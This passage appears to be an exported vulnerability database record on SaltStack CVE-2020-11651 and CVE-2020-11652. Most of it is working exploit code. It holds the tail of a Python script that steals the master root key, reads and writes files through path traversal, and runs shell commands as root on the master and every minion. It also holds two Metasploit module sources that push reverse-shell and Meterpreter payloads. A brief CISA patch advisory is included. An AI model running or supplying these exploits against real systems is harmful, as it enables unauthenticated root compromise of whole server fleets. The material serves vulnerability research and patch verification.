\", end='')\n sys.stdout.flush()\n # try to evil\n try:\n rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"YES\")\n except:\n print(\"ERROR\")\n raise\n else:\n pass\n finally:\n if rets:\n root_key = rets[2]['root']\n return root_key\n\n return None\n\ndef check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (read_token)... \", end='')\n sys.stdout.flush()\n\n # try read file\n msg = {\n 'cmd': 'get_token',\n 'arg': [],\n 'token': top_secret_file_path,\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"YES\")\n except:\n print(\"ERROR\")\n raise\n else:\n if debug:\n print()\n print(rets)\n print(\"NO\")\n \ndef check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key):\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (read)... \", end='')\n sys.stdout.flush()\n\n # try read file\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'file_roots.read',\n 'path': top_secret_file_path,\n 'saltenv': 'base',\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"TIMEOUT\")\n except:\n print(\"ERROR\")\n raise\n else:\n if debug:\n print()\n print(rets)\n if rets['data']['return']:\n print(\"YES\")\n else:\n print(\"NO\")\n\ndef check_CVE_2020_11652_write1(debug, channel, root_key):\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write1)... 
\", end='')\n sys.stdout.flush()\n\n # try read file\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'file_roots.write',\n 'path': '../../../../../../../../tmp/salt_CVE_2020_11652',\n 'data': 'evil',\n 'saltenv': 'base',\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"TIMEOUT\")\n except:\n print(\"ERROR\")\n raise\n else:\n if debug:\n print()\n print(rets)\n\n pp(rets)\n if rets['data']['return'].startswith('Wrote'):\n try:\n os.remove('/tmp/salt_CVE_2020_11652')\n except OSError:\n print(\"Maybe?\")\n else:\n print(\"YES\")\n else:\n print(\"NO\")\n\ndef check_CVE_2020_11652_write2(debug, channel, root_key):\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write2)... \", end='')\n sys.stdout.flush()\n\n # try read file\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'config.update_config',\n 'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652',\n 'yaml_contents': 'evil',\n 'saltenv': 'base',\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"TIMEOUT\")\n except:\n print(\"ERROR\")\n raise\n else:\n if debug:\n print()\n print(rets)\n if rets['data']['return'].startswith('Wrote'):\n try:\n os.remove('/tmp/salt_CVE_2020_11652.conf')\n except OSError:\n print(\"Maybe?\")\n else:\n print(\"YES\")\n else:\n print(\"NO\")\n\ndef pwn_read_file(channel, root_key, path, master_ip):\n print(\"[+] Attemping to read {} from {}\".format(path, master_ip))\n sys.stdout.flush()\n\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'file_roots.read',\n 'path': path,\n 'saltenv': 'base',\n }\n\n rets = channel.send(msg, timeout=3)\n print(rets['data']['return'][0][path])\n\ndef pwn_upload_file(channel, root_key, src, dest, master_ip):\n print(\"[+] Attemping to upload {} to {} on {}\".format(src, dest, master_ip))\n sys.stdout.flush()\n\n try:\n fh = open(src, 'rb')\n payload = fh.read()\n fh.close()\n except Exception as e:\n 
print('[-] Failed to read {}: {}'.format(src, e))\n return\n\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'file_roots.write',\n 'saltenv': 'base',\n 'data': payload,\n 'path': dest,\n }\n\n rets = channel.send(msg, timeout=3)\n print('[ ] {}'.format(rets['data']['return']))\n\ndef pwn_exec(channel, root_key, cmd, master_ip, jid):\n print(\"[+] Attemping to execute {} on {}\".format(cmd, master_ip))\n sys.stdout.flush()\n\n msg = {\n 'key': root_key,\n 'cmd': 'runner',\n 'fun': 'salt.cmd',\n 'saltenv': 'base',\n 'user': 'sudo_user',\n 'kwarg': {\n 'fun': 'cmd.exec_code',\n 'lang': 'python',\n 'code': \"import subprocess;subprocess.call('{}',shell=True)\".format(cmd)\n },\n 'jid': jid,\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except Exception as e:\n print('[-] Failed to submit job')\n return\n\n if rets.get('jid'):\n print('[+] Successfully scheduled job: {}'.format(rets['jid']))\n\ndef pwn_exec_all(channel, root_key, cmd, master_ip, jid):\n print(\"[+] Attemping to execute '{}' on all minions connected to {}\".format(cmd, master_ip))\n sys.stdout.flush()\n\n msg = {\n 'key': root_key,\n 'cmd': '_send_pub',\n 'fun': 'cmd.run',\n 'user': 'root',\n 'arg': [ \"/bin/sh -c '{}'\".format(cmd) ],\n 'tgt': '*',\n 'tgt_type': 'glob',\n 'ret': '',\n 'jid': jid\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except Exception as e:\n print('[-] Failed to submit job')\n return\n finally:\n if rets == None:\n print('[+] Successfully submitted job to all minions.')\n else:\n print('[-] Failed to submit job')\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652')\n parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1')\n parser.add_argument('--port', '-p', dest='master_port', default='4506')\n parser.add_argument('--force', '-f', dest='force', default=False, action='store_false')\n parser.add_argument('--debug', '-d', dest='debug', default=False, 
action='store_true')\n parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true')\n parser.add_argument('--read', '-r', dest='read_file')\n parser.add_argument('--upload-src', dest='upload_src')\n parser.add_argument('--upload-dest', dest='upload_dest')\n parser.add_argument('--exec', dest='exec', help='Run a command on the master')\n parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions')\n args = parser.parse_args()\n\n print(\"[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.\")\n time.sleep(1)\n\n # Both src and destination are required for uploads\n if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None):\n print('[-] Must provide both --upload-src and --upload-dest')\n sys.exit(1)\n\n channel = init_minion(args.master_ip, args.master_port)\n\n if check_salt_version():\n print(\"[ ] This version of salt is vulnerable! Check results below\")\n elif args.force:\n print(\"[*] This version of salt does NOT appear vulnerable. 
Proceeding anyway as requested.\")\n else:\n sys.exit()\n\n check_connection(args.master_ip, args.master_port, channel)\n \n root_key = check_CVE_2020_11651(channel)\n if root_key:\n print('\\n[*] root key obtained: {}'.format(root_key))\n else:\n print('[-] Failed to find root key...aborting')\n sys.exit(127)\n\n if args.run_checks:\n # Assuming this check runs on the master itself, create a file with \"secret\" content\n # and abuse CVE-2020-11652 to read it.\n top_secret_file_path = '/tmp/salt_cve_teta'\n with salt.utils.fopen(top_secret_file_path, 'w') as fd:\n fd.write(\"top secret\")\n\n # Again, this assumes we're running this check on the master itself\n with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd:\n root_key = keyfd.read()\n\n check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path)\n check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key)\n check_CVE_2020_11652_write1(debug, channel, root_key)\n check_CVE_2020_11652_write2(debug, channel, root_key)\n os.remove(top_secret_file_path)\n sys.exit(0)\n\n if args.read_file:\n pwn_read_file(channel, root_key, args.read_file, args.master_ip)\n\n if args.upload_src:\n if os.path.isabs(args.upload_dest):\n print('[-] Destination path must be relative; aborting')\n sys.exit(1)\n pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip)\n\n\n jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow())\n\n if args.exec:\n pwn_exec(channel, root_key, args.exec, args.master_ip, jid)\n\n if args.exec_all:\n print(\"[!] Lester, is this what you want? 
Hit ^C to abort.\")\n time.sleep(2)\n pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid)\n\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/34389", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-18T21:23:51", "description": "This Metasploit module exploits unauthenticated access to the runner() and _send_pub() methods in the SaltStack Salt master's ZeroMQ request server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to execute code as root on either the master or on select minions. VMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are known to be affected by the Salt vulnerabilities. Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T00:00:00", "type": "zdt", "title": "SaltStack Salt Master/Minion Unauthenticated Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-12T00:00:00", "id": 
"1337DAY-ID-34423", "href": "https://0day.today/exploit/description/34423", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::ZeroMQ\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::CmdStager::HTTP # HACK: This is a mixin of a mixin\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SaltStack Salt Master/Minion Unauthenticated RCE',\n 'Description' => %q{\n This module exploits unauthenticated access to the runner() and\n _send_pub() methods in the SaltStack Salt master's ZeroMQ request\n server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to\n execute code as root on either the master or on select minions.\n\n VMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are\n known to be affected by the Salt vulnerabilities.\n\n Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as\n well as Vulhub's Docker image.\n },\n 'Author' => [\n 'F-Secure', # Discovery\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-11651'], # Auth bypass (used by this module)\n ['CVE', '2020-11652'], # Authed directory traversals (not used here)\n ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],\n ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'],\n ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']\n ],\n 'DisclosureDate' => '2020-04-30', # F-Secure advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['python', 'unix'],\n 'Arch' => [ARCH_PYTHON, ARCH_CMD],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Master (Python payload)',\n 
'Description' => 'Executing Python payload on the master',\n 'Type' => :python,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_https'\n }\n ],\n [\n 'Master (Unix command)',\n 'Description' => 'Executing Unix command on the master',\n 'Type' => :unix_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n ],\n [\n 'Minions (Python payload)',\n 'Description' => 'Executing Python payload on the minions',\n 'Type' => :python,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_https'\n }\n ],\n [\n 'Minions (Unix command)',\n 'Description' => 'Executing Unix command on the minions',\n 'Type' => :unix_command,\n 'DefaultOptions' => {\n # cmd/unix/reverse_python_ssl crashes in this target\n 'PAYLOAD' => 'cmd/unix/reverse_python'\n }\n ]\n ],\n 'DefaultTarget' => 0, # Defaults to master for safety\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/gather/saltstack_salt_root_key'\n },\n 'Notes' => {\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May hang up the service\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(4506),\n OptRegexp.new('MINIONS', [true, 'PCRE regex of minions to target', /.*/])\n ])\n\n register_advanced_options([\n OptInt.new('WfsDelay', [true, 'Seconds to wait for *all* sessions', 10])\n ])\n\n # XXX: https://github.com/rapid7/metasploit-framework/issues/12963\n import_target_defaults\n end\n\n # NOTE: check is provided by auxiliary/gather/saltstack_salt_root_key\n\n def exploit\n # check.reason is from auxiliary/gather/saltstack_salt_root_key\n if target.name.start_with?('Master')\n unless (root_key = check.reason)\n fail_with(Failure::BadConfig,\n \"#{target['Description']} requires a root key\")\n end\n\n print_good(\"Successfully obtained root key: #{root_key}\")\n end\n\n # These are from Msf::Exploit::Remote::ZeroMQ\n zmq_connect\n zmq_negotiate\n\n print_status(\"#{target['Description']}: 
#{datastore['PAYLOAD']}\")\n\n case target.name\n when /^Master/\n yeet_runner(root_key)\n when /^Minions/\n yeet_send_pub\n end\n\n # HACK: Hijack WfsDelay to wait for _all_ sessions, not just the first one\n sleep(wfs_delay)\n rescue EOFError, Rex::ConnectionError => e\n print_error(\"#{e.class}: #{e.message}\")\n ensure\n # This is from Msf::Exploit::Remote::ZeroMQ\n zmq_disconnect\n end\n\n def yeet_runner(root_key)\n print_status(\"Yeeting runner() at #{peer}\")\n\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L1898-L1951\n # https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L1898-L1951\n runner = {\n 'cmd' => 'runner',\n # https://docs.saltstack.com/en/master/ref/runners/all/salt.runners.salt.html#salt.runners.salt.cmd\n 'fun' => 'salt.cmd',\n 'kwarg' => {\n 'hide_output' => true,\n 'ignore_retcode' => true,\n 'output_loglevel' => 'quiet'\n },\n 'user' => 'root', # This is NOT the Unix user!\n 'key' => root_key # No JID needed, only the root key!\n }\n\n case target['Type']\n when :python\n vprint_status(\"Executing Python code: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code\n runner['kwarg'].merge!(\n 'fun' => 'cmd.exec_code',\n 'lang' => payload.arch.first,\n 'code' => payload.encoded\n )\n when :unix_command\n # HTTPS doesn't appear to be supported by the server :(\n print_status(\"Serving intermediate stager over HTTP: #{start_service}\")\n\n vprint_status(\"Executing Unix command: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.script\n runner['kwarg'].merge!(\n # cmd.run doesn't work due to a missing argument error, so we use this\n 'fun' => 'cmd.script',\n 'source' => get_uri,\n 'stdin' => payload.encoded\n )\n end\n\n vprint_status(\"Unserialized clear load: #{runner}\")\n zmq_send_message(serialize_clear_load(runner))\n\n unless (res = sock.get_once)\n 
fail_with(Failure::Unknown, 'Did not receive runner() response')\n end\n\n vprint_good(\"Received runner() response: #{res.inspect}\")\n end\n\n def yeet_send_pub\n print_status(\"Yeeting _send_pub() at #{peer}\")\n\n # NOTE: A unique JID (job ID) is needed for every published job\n jid = generate_jid\n\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L2043-L2151\n # https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L2043-L2151\n send_pub = {\n 'cmd' => '_send_pub',\n 'kwargs' => {\n 'bg' => true,\n 'hide_output' => true,\n 'ignore_retcode' => true,\n 'output_loglevel' => 'quiet',\n 'show_jid' => false,\n 'show_timeout' => false\n },\n 'user' => 'root', # This is NOT the Unix user!\n 'tgt' => datastore['MINIONS'].source,\n 'tgt_type' => 'pcre',\n 'jid' => jid\n }\n\n case target['Type']\n when :python\n vprint_status(\"Executing Python code: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code\n send_pub.merge!(\n 'fun' => 'cmd.exec_code',\n 'arg' => [payload.arch.first, payload.encoded]\n )\n when :unix_command\n vprint_status(\"Executing Unix command: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.run\n send_pub.merge!(\n 'fun' => 'cmd.run',\n 'arg' => [payload.encoded]\n )\n end\n\n vprint_status(\"Unserialized clear load: #{send_pub}\")\n zmq_send_message(serialize_clear_load(send_pub))\n\n unless (res = sock.get_once)\n fail_with(Failure::Unknown, 'Did not receive _send_pub() response')\n end\n\n vprint_good(\"Received _send_pub() response: #{res.inspect}\")\n\n # NOTE: This path will likely change between platforms and distros\n register_file_for_cleanup(\"/var/cache/salt/minion/proc/#{jid}\")\n end\n\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/utils/jid.py\n # https://github.com/saltstack/salt/blob/v3000.1/salt/utils/jid.py\n def generate_jid\n 
DateTime.now.new_offset.strftime('%Y%m%d%H%M%S%6N')\n end\n\n # HACK: Stub out the command stager used by Msf::Exploit::CmdStager::HTTP\n def stager_instance\n nil\n end\n\n # HACK: Sub out the executable used by Msf::Exploit::CmdStager::HTTP\n def exe\n # NOTE: The shebang line is necessary in this case!\n <<~SHELL\n #!/bin/sh\n /bin/sh\n SHELL\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34423", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-02-24T18:06:48", "description": "SaltStack has released a security update to address critical vulnerabilities affecting Salt versions prior to 2019.2.4 and 3000.2. Salt is an open-source remote task and configuration management framework widely used in data centers and cloud servers. A remote attacker could exploit these vulnerabilities to take control of an affected system. These vulnerabilities were detected in exploits in the wild.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following SaltStack products and apply the necessary update as soon as possible: \n\n * Release Notes for [Salt 2019.2.4](<https://docs.saltstack.com/en/latest/topics/releases/2019.2.4.html>) and [Salt 3000.2](<https://docs.saltstack.com/en/latest/topics/releases/3000.2.html>)\n * Blog on [Critical Vulnerabilities Update: CVE-2020-11651 and CVE-2020-11652](<https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/>)\n * Tips on [Hardening Salt](<https://docs.saltstack.com/en/latest/topics/hardening.html#general-hardening-tip>)\n", "edition": 2,
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-01T00:00:00", "type": "cisa", "title": "SaltStack Patches Critical Vulnerabilities in Salt", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-04T00:00:00", "id": "CISA:6A06982A8847F277D71953FBD9CA4A0E", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/05/01/saltstack-patches-critical-vulnerabilities-salt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-11-02T10:49:39", "description": "This module exploits unauthenticated access to the runner() and _send_pub() methods in the SaltStack Salt master's ZeroMQ request server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to execute code as root on either the master or on select minions. 
VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2, 1.3, 1.5, and 1.6 in certain configurations, are known to be affected by the Salt vulnerabilities. Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image.\n", "cvss3": {}, "published": "2020-05-11T17:05:38", "type": "metasploit", "title": "SaltStack Salt Master/Minion Unauthenticated RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2021-09-17T21:34:46", "id": "MSF:EXPLOIT-LINUX-MISC-SALTSTACK_SALT_UNAUTH_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/misc/saltstack_salt_unauth_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::ZeroMQ\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::CmdStager::HTTP # HACK: This is a mixin of a mixin\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SaltStack Salt Master/Minion Unauthenticated RCE',\n 'Description' => %q{\n This module exploits unauthenticated access to the runner() and\n _send_pub() methods in the SaltStack Salt master's ZeroMQ request\n server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to\n execute code as root on either the master or on select minions.\n\n VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as\n well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual\n Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2,\n 1.3, 1.5, and 1.6 in certain configurations, are known to be affected\n by the Salt vulnerabilities.\n\n Tested against 
SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as\n well as Vulhub's Docker image.\n },\n 'Author' => [\n 'F-Secure', # Discovery\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-11651'], # Auth bypass (used by this module)\n ['CVE', '2020-11652'], # Authed directory traversals (not used here)\n ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],\n ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'],\n ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG'],\n ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']\n ],\n 'DisclosureDate' => '2020-04-30', # F-Secure advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['python', 'unix'],\n 'Arch' => [ARCH_PYTHON, ARCH_CMD],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Master (Python payload)',\n {\n 'Description' => 'Executing Python payload on the master',\n 'Platform' => 'python',\n 'Arch' => ARCH_PYTHON,\n 'Type' => :python,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_https'\n }\n }\n ],\n [\n 'Master (Unix command)',\n {\n 'Description' => 'Executing Unix command on the master',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Minions (Python payload)',\n {\n 'Description' => 'Executing Python payload on the minions',\n 'Platform' => 'python',\n 'Arch' => ARCH_PYTHON,\n 'Type' => :python,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_https'\n }\n }\n ],\n [\n 'Minions (Unix command)',\n {\n 'Description' => 'Executing Unix command on the minions',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n # cmd/unix/reverse_python_ssl crashes in this 
target\n 'PAYLOAD' => 'cmd/unix/reverse_python'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0, # Defaults to master for safety\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/gather/saltstack_salt_root_key'\n },\n 'Notes' => {\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May hang up the service\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(4506),\n OptString.new('ROOT_KEY', [false, \"Master's root key if you have it\"]),\n OptRegexp.new('MINIONS', [true, 'PCRE regex of minions to target', '.*'])\n ])\n\n register_advanced_options([\n OptInt.new('WfsDelay', [true, 'Seconds to wait for *all* sessions', 10])\n ])\n end\n\n # NOTE: check is provided by auxiliary/gather/saltstack_salt_root_key\n\n def exploit\n if target.name.start_with?('Master')\n if (root_key = datastore['ROOT_KEY'])\n print_status(\"User-specified root key: #{root_key}\")\n else\n # check.reason is from auxiliary/gather/saltstack_salt_root_key\n root_key = check.reason\n end\n\n unless root_key\n fail_with(Failure::BadConfig,\n \"#{target['Description']} requires a root key\")\n end\n end\n\n # These are from Msf::Exploit::Remote::ZeroMQ\n zmq_connect\n zmq_negotiate\n\n print_status(\"#{target['Description']}: #{datastore['PAYLOAD']}\")\n\n case target.name\n when /^Master/\n yeet_runner(root_key)\n when /^Minions/\n yeet_send_pub\n end\n\n # HACK: Hijack WfsDelay to wait for _all_ sessions, not just the first one\n sleep(wfs_delay)\n rescue EOFError, Rex::ConnectionError => e\n print_error(\"#{e.class}: #{e.message}\")\n ensure\n # This is from Msf::Exploit::Remote::ZeroMQ\n zmq_disconnect\n end\n\n def yeet_runner(root_key)\n print_status(\"Yeeting runner() at #{peer}\")\n\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L1898-L1951\n # https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L1898-L1951\n runner = {\n 'cmd' => 'runner',\n # 
https://docs.saltstack.com/en/master/ref/runners/all/salt.runners.salt.html#salt.runners.salt.cmd\n 'fun' => 'salt.cmd',\n 'kwarg' => {\n 'hide_output' => true,\n 'ignore_retcode' => true,\n 'output_loglevel' => 'quiet'\n },\n 'user' => 'root', # This is NOT the Unix user!\n 'key' => root_key # No JID needed, only the root key!\n }\n\n case target['Type']\n when :python\n vprint_status(\"Executing Python code: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code\n runner['kwarg'].merge!(\n 'fun' => 'cmd.exec_code',\n 'lang' => payload.arch.first,\n 'code' => payload.encoded\n )\n when :unix_cmd\n # HTTPS doesn't appear to be supported by the server :(\n print_status(\"Serving intermediate stager over HTTP: #{start_service}\")\n\n vprint_status(\"Executing Unix command: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.script\n runner['kwarg'].merge!(\n # cmd.run doesn't work due to a missing argument error, so we use this\n 'fun' => 'cmd.script',\n 'source' => get_uri,\n 'stdin' => payload.encoded\n )\n end\n\n vprint_status(\"Unserialized clear load: #{runner}\")\n zmq_send_message(serialize_clear_load(runner))\n\n unless (res = sock.get_once)\n fail_with(Failure::Unknown, 'Did not receive runner() response')\n end\n\n vprint_good(\"Received runner() response: #{res.inspect}\")\n end\n\n def yeet_send_pub\n print_status(\"Yeeting _send_pub() at #{peer}\")\n\n # NOTE: A unique JID (job ID) is needed for every published job\n jid = generate_jid\n\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L2043-L2151\n # https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L2043-L2151\n send_pub = {\n 'cmd' => '_send_pub',\n 'kwargs' => {\n 'bg' => true,\n 'hide_output' => true,\n 'ignore_retcode' => true,\n 'output_loglevel' => 'quiet',\n 'show_jid' => false,\n 'show_timeout' => false\n },\n 
